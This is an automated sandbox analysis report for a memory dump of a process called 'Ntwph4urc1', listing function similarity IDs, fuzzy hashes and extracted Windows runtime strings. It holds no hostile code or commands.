                                              • Instruction Fuzzy Hash: F631A1B6508304DFE320CF29C880A5BBBE8EF88694F91092EF99487211DA35DD05CBD3
                                              Strings
                                              • SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx, xrefs: 369B2A95
                                              • RtlpInitializeAssemblyStorageMap, xrefs: 369B2A90
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Offset: 36910000, based on PE: true
                                              • Associated: 00000006.00000002.3114944533.0000000036A39000.00000040.00001000.00020000.00000000.sdmp
                                              • Associated: 00000006.00000002.3114944533.0000000036A3D000.00000040.00001000.00020000.00000000.sdmp
                                              • Associated: 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: RtlpInitializeAssemblyStorageMap$SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx
                                              • API String ID: 0-2653619699
                                              • Opcode ID: 496b0499f6b93a181f1111dac3357a8150011a4bb130fc1b6c21cd1e3e2c0fb5
                                              • Instruction ID: cc48ae2cf54b11977a233043a2e4c8eb981fa94126899d0e25c4096ef0b5a4b7
                                              • Opcode Fuzzy Hash: 496b0499f6b93a181f1111dac3357a8150011a4bb130fc1b6c21cd1e3e2c0fb5
                                              • Instruction Fuzzy Hash: F6115972B00215BBFB29CA498D41F6B76ADDF88B54F2480297A00EF285D675CD00DAE4
                                              APIs
                                              • @_EH4_CallFilterFunc@8.LIBCMT ref: 36A13356
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Offset: 36910000, based on PE: true
                                              • Associated: 00000006.00000002.3114944533.0000000036A39000.00000040.00001000.00020000.00000000.sdmp
                                              • Associated: 00000006.00000002.3114944533.0000000036A3D000.00000040.00001000.00020000.00000000.sdmp
                                              • Associated: 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID: CallFilterFunc@8
                                              • String ID:
                                              • API String ID: 4062629308-0
                                              • Opcode ID: b892c9876d01218a3b4b65668f5d66aa18beaddc6f3c762128d39f70a6431831
                                              • Instruction ID: 16b855bfa92ba3b94ce371c19c462cb054de2b0c40a7dc814b1df5205424d005
                                              • Opcode Fuzzy Hash: b892c9876d01218a3b4b65668f5d66aa18beaddc6f3c762128d39f70a6431831
                                              • Instruction Fuzzy Hash: 74C113B59017298FDB20DF1AC9846A9FBF5FB88314F5081EED94DAB250D734AA81CF40
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Offset: 36910000, based on PE: true
                                              • Associated: 00000006.00000002.3114944533.0000000036A39000.00000040.00001000.00020000.00000000.sdmp
                                              • Associated: 00000006.00000002.3114944533.0000000036A3D000.00000040.00001000.00020000.00000000.sdmp
                                              • Associated: 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID: DebugPrintTimes
                                              • String ID:
                                              • API String ID: 3446177414-0
                                              • Opcode ID: c88a4c23dc91582ba5a622ede5cf581dd67036cb877f6a3acd4b390ec2789b9b
                                              • Instruction ID: b75380e4f03bc9590e4dc688bd873feab1477af6aec2fb753ef0f44cc958ad8f
                                              • Opcode Fuzzy Hash: c88a4c23dc91582ba5a622ede5cf581dd67036cb877f6a3acd4b390ec2789b9b
                                              • Instruction Fuzzy Hash: BAB112B5A083408FD355CF29C980A6AFBF1BB89304F54496EE999D7352D731E845CB82
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Offset: 36910000, based on PE: true
                                              • Associated: 00000006.00000002.3114944533.0000000036A39000.00000040.00001000.00020000.00000000.sdmp
                                              • Associated: 00000006.00000002.3114944533.0000000036A3D000.00000040.00001000.00020000.00000000.sdmp
                                              • Associated: 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: e08422da25104e8446692cc04ba98b6067a944e8dd01ba53c3b35a02c4cb1f74
                                              • Instruction ID: 8a51dca710e64fcd83b0ce361ca3f761b5cd694f1f348b8e154df82900ac552c
                                              • Opcode Fuzzy Hash: e08422da25104e8446692cc04ba98b6067a944e8dd01ba53c3b35a02c4cb1f74
                                              • Instruction Fuzzy Hash: 0DA16F75A08345CFE311DF28C884A1ABBFABF88344F21492DF5859B351E730E945CB92
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Offset: 36910000, based on PE: true
                                              • Associated: 00000006.00000002.3114944533.0000000036A39000.00000040.00001000.00020000.00000000.sdmp
                                              • Associated: 00000006.00000002.3114944533.0000000036A3D000.00000040.00001000.00020000.00000000.sdmp
                                              • Associated: 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: c7f1e65f05da416c7b75d31f65c42fe8ed11f82a088b67d1105c3ed684dc1467
                                              • Instruction ID: e765a421687727a4346f91f9d8ae2d8945e275b06bd3f9f863025eef2176100f
                                              • Opcode Fuzzy Hash: c7f1e65f05da416c7b75d31f65c42fe8ed11f82a088b67d1105c3ed684dc1467
                                              • Instruction Fuzzy Hash: 62615075E04609EFEB09DF78C884A9DFBB5FF88244F24816AD519AB301DB30A951CBD1
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Offset: 36910000, based on PE: true
                                              • Associated: 00000006.00000002.3114944533.0000000036A39000.00000040.00001000.00020000.00000000.sdmp
                                              • Associated: 00000006.00000002.3114944533.0000000036A3D000.00000040.00001000.00020000.00000000.sdmp
                                              • Associated: 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: d834a5c97c3d98f4e6477dadb35c5ba2a0b0c7a476414205ef95cb780003ea72
                                              • Instruction ID: 9eac7b57e74e7d18592d36d68cf45dbabb68ee888af57224786fbba6343c4b2f
                                              • Opcode Fuzzy Hash: d834a5c97c3d98f4e6477dadb35c5ba2a0b0c7a476414205ef95cb780003ea72
                                              • Instruction Fuzzy Hash: 1C4138B4D113889FDB10CFA9C880AAEBBF8FF49340F60816ED559A7211D7319A15CF60
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Offset: 36910000, based on PE: true
                                              • Associated: 00000006.00000002.3114944533.0000000036A39000.00000040.00001000.00020000.00000000.sdmp
                                              • Associated: 00000006.00000002.3114944533.0000000036A3D000.00000040.00001000.00020000.00000000.sdmp
                                              • Associated: 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID: DebugPrintTimes
                                              • String ID:
                                              • API String ID: 3446177414-0
                                              • Opcode ID: 78e2ba8c250f9ec0f528957c8dee61c8f5da89ab99a186bf5eaab38ab4c28c4c
                                              • Instruction ID: bbdcba4d9f93d1645916531de9a1ebc67dec54c335239ffe41ed91e760d24d24
                                              • Opcode Fuzzy Hash: 78e2ba8c250f9ec0f528957c8dee61c8f5da89ab99a186bf5eaab38ab4c28c4c
                                              • Instruction Fuzzy Hash: B5312172902304AFD711CF18C880A5677B9EF853A4F71426AEE449F296DB31ED02CBE0
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Offset: 36910000, based on PE: true
                                              • Associated: 00000006.00000002.3114944533.0000000036A39000.00000040.00001000.00020000.00000000.sdmp
                                              • Associated: 00000006.00000002.3114944533.0000000036A3D000.00000040.00001000.00020000.00000000.sdmp
                                              • Associated: 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID: DebugPrintTimes
                                              • String ID:
                                              • API String ID: 3446177414-0
                                              • Opcode ID: a704e17954097818cc4a72c62e60ef91fefd151b4c344ccefff3729be9004e90
                                              • Instruction ID: 6d44ca43bf17a54d02a6d542570baf43e220ba428d7cf5320a8a8cba77180bdc
                                              • Opcode Fuzzy Hash: a704e17954097818cc4a72c62e60ef91fefd151b4c344ccefff3729be9004e90
                                              • Instruction Fuzzy Hash: 10317C35A25A05BFE746DB68CE40A89BBA6FF48248F615025E90187B51DB31EC31CBC1
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Offset: 36910000, based on PE: true
                                              • Associated: 00000006.00000002.3114944533.0000000036A39000.00000040.00001000.00020000.00000000.sdmp
                                              • Associated: 00000006.00000002.3114944533.0000000036A3D000.00000040.00001000.00020000.00000000.sdmp
                                              • Associated: 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID: DebugPrintTimes
                                              • String ID:
                                              • API String ID: 3446177414-0
                                              • Opcode ID: 20922d002b0bb08bad7c65ea5b3b672d356deb93cbb943a398ff02778d9a4fef
                                              • Instruction ID: cd0ab48b1df2fa91f9c9d29014d47e826908c6b2dfc4c2d33f9a081bfd8f6c4f
                                              • Opcode Fuzzy Hash: 20922d002b0bb08bad7c65ea5b3b672d356deb93cbb943a398ff02778d9a4fef
                                              • Instruction Fuzzy Hash: ED2156355063519FE762EF26C944B16BBA8FF88714FF10458E9404B601C730EC04CB92
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Offset: 36910000, based on PE: true
                                              • Associated: 00000006.00000002.3114944533.0000000036A39000.00000040.00001000.00020000.00000000.sdmp
                                              • Associated: 00000006.00000002.3114944533.0000000036A3D000.00000040.00001000.00020000.00000000.sdmp
                                              • Associated: 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID: DebugPrintTimes
                                              • String ID:
                                              • API String ID: 3446177414-0
                                              • Opcode ID: 7298b55c9925385d9f9b211705a2ccd5b90a0e451ae02c4f1c9d3f21e9044580
                                              • Instruction ID: b4694f06fa831d2bb03404d2fbb3d3552bd504e17b825c6e811d39d1047310c4
                                              • Opcode Fuzzy Hash: 7298b55c9925385d9f9b211705a2ccd5b90a0e451ae02c4f1c9d3f21e9044580
                                              • Instruction Fuzzy Hash: 08F0FA72200340ABD731DB09CC04F9BBBEDEF84B40F280118EA4A93091E6A0A909C660
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Offset: 36910000, based on PE: true
                                              • Associated: 00000006.00000002.3114944533.0000000036A39000.00000040.00001000.00020000.00000000.sdmp
                                              • Associated: 00000006.00000002.3114944533.0000000036A3D000.00000040.00001000.00020000.00000000.sdmp
                                              • Associated: 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: W
                                              • API String ID: 0-655174618
                                              • Opcode ID: 3c879bcdd362c70686aa2104eb330bf353ab972d3d400910cb6f7df117cc44a1
                                              • Instruction ID: c1e3f629ac00142386fdc493bc95e521dbe49d4c2335dbd132bd1fda318ffbce
                                              • Opcode Fuzzy Hash: 3c879bcdd362c70686aa2104eb330bf353ab972d3d400910cb6f7df117cc44a1
                                              • Instruction Fuzzy Hash: 4EA137B5E007298FEB21CF25CD80BD9BBB1AB49315F1041EAD849AB351D7349E85CF91
                                              Strings
                                              • System Volume Information, xrefs: 369EDEBE
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Offset: 36910000, based on PE: true
                                              • Associated: 00000006.00000002.3114944533.0000000036A39000.00000040.00001000.00020000.00000000.sdmp
                                              • Associated: 00000006.00000002.3114944533.0000000036A3D000.00000040.00001000.00020000.00000000.sdmp
                                              • Associated: 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: System Volume Information
                                              • API String ID: 0-764423717
                                              • Opcode ID: 21860660a2e290c0cc47683a14d37816adfa7ae55b38d46ba16cf3fa2d57137c
                                              • Instruction ID: 13368287a6150c805b2513923a83e6b3c03074727e05ce2d61f512980c4a64a0
                                              • Opcode Fuzzy Hash: 21860660a2e290c0cc47683a14d37816adfa7ae55b38d46ba16cf3fa2d57137c
                                              • Instruction Fuzzy Hash: D0616A75108315AFD712DF54CC80E6BB7E9EF98B90F00092DF9809B2A1E674DD48CB92
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Offset: 36910000, based on PE: true
                                              • Associated: 00000006.00000002.3114944533.0000000036A39000.00000040.00001000.00020000.00000000.sdmp
                                              • Associated: 00000006.00000002.3114944533.0000000036A3D000.00000040.00001000.00020000.00000000.sdmp
                                              • Associated: 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: @
                                              • API String ID: 0-2766056989
                                              • Opcode ID: 32fdc9af89b0788a3bba97dbd317d7b10cd0208f20562fc1281393ba3f626ce3
                                              • Instruction ID: 5bdc14dcf6ce23ce0b7e6d8878296f8d507e172fc4588e01d8c762806f271e0a
                                              • Opcode Fuzzy Hash: 32fdc9af89b0788a3bba97dbd317d7b10cd0208f20562fc1281393ba3f626ce3
                                              • Instruction Fuzzy Hash: 53615C75D05319AFEB12DFAAC940B9EBBF8FF84754F244169E810AB250D7749E00CB91
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Offset: 36910000, based on PE: true
                                              • Associated: 00000006.00000002.3114944533.0000000036A39000.00000040.00001000.00020000.00000000.sdmp
                                              • Associated: 00000006.00000002.3114944533.0000000036A3D000.00000040.00001000.00020000.00000000.sdmp
                                              • Associated: 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: @
                                              • API String ID: 0-2766056989
                                              • Opcode ID: 8281e956446473216ed512d18dfae26456dfb93296f0f4edbd2d8efa18977056
                                              • Instruction ID: 4dfad568f27073189cd9d05d5767498371dfe5f67f8473c212e420c9b54651ee
                                              • Opcode Fuzzy Hash: 8281e956446473216ed512d18dfae26456dfb93296f0f4edbd2d8efa18977056
                                              • Instruction Fuzzy Hash: A2516AB2514745AFEB11CF55CC40F6AB7E8FF84794F500929BA809B291DBB4ED04CBA2
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Offset: 36910000, based on PE: true
                                              • Associated: 00000006.00000002.3114944533.0000000036A39000.00000040.00001000.00020000.00000000.sdmp
                                              • Associated: 00000006.00000002.3114944533.0000000036A3D000.00000040.00001000.00020000.00000000.sdmp
                                              • Associated: 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: @
                                              • API String ID: 0-2766056989
                                              • Opcode ID: f6d24db04a8b22f10dd332497e656ae38b365cd664294fb4cdc3bf0e0e6027ed
                                              • Instruction ID: 5514f14cd5714ca5604c487a98eabfc75da84107ed5bb9c12b4499c61616609d
                                              • Opcode Fuzzy Hash: f6d24db04a8b22f10dd332497e656ae38b365cd664294fb4cdc3bf0e0e6027ed
                                              • Instruction Fuzzy Hash: F4515B716047109FD321CF65C840A6BB7E8FF88B50F00492EF9959B691E774E904CBA6
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Offset: 36910000, based on PE: true
                                              • Associated: 00000006.00000002.3114944533.0000000036A39000.00000040.00001000.00020000.00000000.sdmp
                                              • Associated: 00000006.00000002.3114944533.0000000036A3D000.00000040.00001000.00020000.00000000.sdmp
                                              • Associated: 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: PreferredUILanguages
                                              • API String ID: 0-1884656846
                                              • Opcode ID: 4e5e0e88ab8e18639a8c9ef3a068ec103c19f375ddbd47ce6224bee32f61a5c9
                                              • Instruction ID: 4f7f7d28e730bd001d28f94a9d263039c1bb6b6c198af752c7bddc1886271149
                                              • Opcode Fuzzy Hash: 4e5e0e88ab8e18639a8c9ef3a068ec103c19f375ddbd47ce6224bee32f61a5c9
                                              • Instruction Fuzzy Hash: F94122B6D11218ABDF11CE95CC40BEEB3BEEF44751F22012AE804AF258D6B1DE00C7A0
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Offset: 36910000, based on PE: true
                                              • Associated: 00000006.00000002.3114944533.0000000036A39000.00000040.00001000.00020000.00000000.sdmp
                                              • Associated: 00000006.00000002.3114944533.0000000036A3D000.00000040.00001000.00020000.00000000.sdmp
                                              • Associated: 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: verifier.dll
                                              • API String ID: 0-3265496382
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Offset: 36910000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: #
                                              • API String ID: 0-1885708031
                                              Strings
                                              • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 36940058
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Offset: 36910000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode
                                              • API String ID: 0-996340685
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Offset: 36910000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: Flst
                                              • API String ID: 0-2374792617
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Offset: 36910000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID: DebugPrintTimes
                                              • String ID: L4CwL4Cw
                                              • API String ID: 3446177414-1654103815
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Offset: 36910000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: Actx
                                              • API String ID: 0-89312691
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Offset: 36910000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: LdrCreateEnclave
                                              • API String ID: 0-3262589265
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Offset: 36910000, based on PE: true
                                               • Associated: 00000006.00000002.3114944533.0000000036A39000.00000040.00001000.00020000.00000000.sdmp
                                               • Associated: 00000006.00000002.3114944533.0000000036A3D000.00000040.00001000.00020000.00000000.sdmp
                                               • Associated: 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 883f9cb35d7f76e7f6072baad1e92a52fae16a30995381596f7185fa14ae9d4e
                                              • Instruction ID: 0a7b29e4a4ee56270202d49d7fb28e49a5724d461d42e8d041b241d22a2bf052
                                              • Opcode Fuzzy Hash: 883f9cb35d7f76e7f6072baad1e92a52fae16a30995381596f7185fa14ae9d4e
                                              • Instruction Fuzzy Hash: 5F612675A0C7418BE301CF65E994B5AB7E4BF88708F15546DEC998F281DB36E806CF82
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Offset: 36910000, based on PE: true
                                               • Associated: 00000006.00000002.3114944533.0000000036A39000.00000040.00001000.00020000.00000000.sdmp
                                               • Associated: 00000006.00000002.3114944533.0000000036A3D000.00000040.00001000.00020000.00000000.sdmp
                                               • Associated: 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 052f7e48f707ae7ada43a21ed0f01f3adcb9538794b078f93221dc2609354f0a
                                              • Instruction ID: 30c44bd0f2fefa38878144ed927ae4813f4baa407de1664e0333ebfa0b6ee97e
                                              • Opcode Fuzzy Hash: 052f7e48f707ae7ada43a21ed0f01f3adcb9538794b078f93221dc2609354f0a
                                              • Instruction Fuzzy Hash: 9151BE71608301DFDB05DF29DC40A5BB7EAEBA8754F61892DF455C7240E734D815CBA2
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Offset: 36910000, based on PE: true
                                               • Associated: 00000006.00000002.3114944533.0000000036A39000.00000040.00001000.00020000.00000000.sdmp
                                               • Associated: 00000006.00000002.3114944533.0000000036A3D000.00000040.00001000.00020000.00000000.sdmp
                                               • Associated: 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 421d61e5bc4c825cfb3b344d513b1230fd482de7481e25e13c6dc44851e8f620
                                              • Instruction ID: c7d5ce1beff0f5c252bb63d31ae0716f46c1b7fbe9f08ff58298149ec1c615c0
                                              • Opcode Fuzzy Hash: 421d61e5bc4c825cfb3b344d513b1230fd482de7481e25e13c6dc44851e8f620
                                              • Instruction Fuzzy Hash: 9551F9BAA00312DFDF01DF668C80AAB77E9EF84694F500429F944C7251EB75C959C7E2
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Offset: 36910000, based on PE: true
                                               • Associated: 00000006.00000002.3114944533.0000000036A39000.00000040.00001000.00020000.00000000.sdmp
                                               • Associated: 00000006.00000002.3114944533.0000000036A3D000.00000040.00001000.00020000.00000000.sdmp
                                               • Associated: 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: ed239e9abffda92a0b57496fa8d50c22cd5aec9260d14a243e4e168f360e265f
                                              • Instruction ID: eb8c1fea23b5190fa4adfccb1b7597b2951159e430ab50d76ead746cc83b09fd
                                              • Opcode Fuzzy Hash: ed239e9abffda92a0b57496fa8d50c22cd5aec9260d14a243e4e168f360e265f
                                              • Instruction Fuzzy Hash: 5551E2B15047049FE721DF29CD84F6A77E9EF857A4F20062DEA119B292DB30DC06C7A6
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Offset: 36910000, based on PE: true
                                               • Associated: 00000006.00000002.3114944533.0000000036A39000.00000040.00001000.00020000.00000000.sdmp
                                               • Associated: 00000006.00000002.3114944533.0000000036A3D000.00000040.00001000.00020000.00000000.sdmp
                                               • Associated: 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: f2ae96f13e62a8038b23ccb08048a1730c7b12a772aeba8f04c25d69ae98cb5f
                                              • Instruction ID: cc0dd8850f333103859d525b63598434b2b4b8977d9da8dcccc206eac3f2faea
                                              • Opcode Fuzzy Hash: f2ae96f13e62a8038b23ccb08048a1730c7b12a772aeba8f04c25d69ae98cb5f
                                              • Instruction Fuzzy Hash: 6C41F171A027109FE716CF19CC80B16B7B9EF457A4F31442AF6499B295EB309C41CB90
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Offset: 36910000, based on PE: true
                                               • Associated: 00000006.00000002.3114944533.0000000036A39000.00000040.00001000.00020000.00000000.sdmp
                                               • Associated: 00000006.00000002.3114944533.0000000036A3D000.00000040.00001000.00020000.00000000.sdmp
                                               • Associated: 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 934e10c426fd61bd8fe604d42b787c20ccf45b123ad7e35132740a4044cf7b71
                                              • Instruction ID: 185697fd9cdb1fac6868f884b1bf381e7bba76baaae49f0188ed9cffe7ad66cd
                                              • Opcode Fuzzy Hash: 934e10c426fd61bd8fe604d42b787c20ccf45b123ad7e35132740a4044cf7b71
                                              • Instruction Fuzzy Hash: 7D518D70900319AFEF21CFA6CC81B9DBBB9FF05354FA0012AE594AB152DB719948DF51
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Offset: 36910000, based on PE: true
                                               • Associated: 00000006.00000002.3114944533.0000000036A39000.00000040.00001000.00020000.00000000.sdmp
                                               • Associated: 00000006.00000002.3114944533.0000000036A3D000.00000040.00001000.00020000.00000000.sdmp
                                               • Associated: 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 40b092e3c373cff9d8e4a34326211c42fd290127084dc6e40b34e6ab90e02a86
                                              • Instruction ID: 189590e813dd20e741949144fb9535ab4409b12828b1bce639d7381cf6fe0aa9
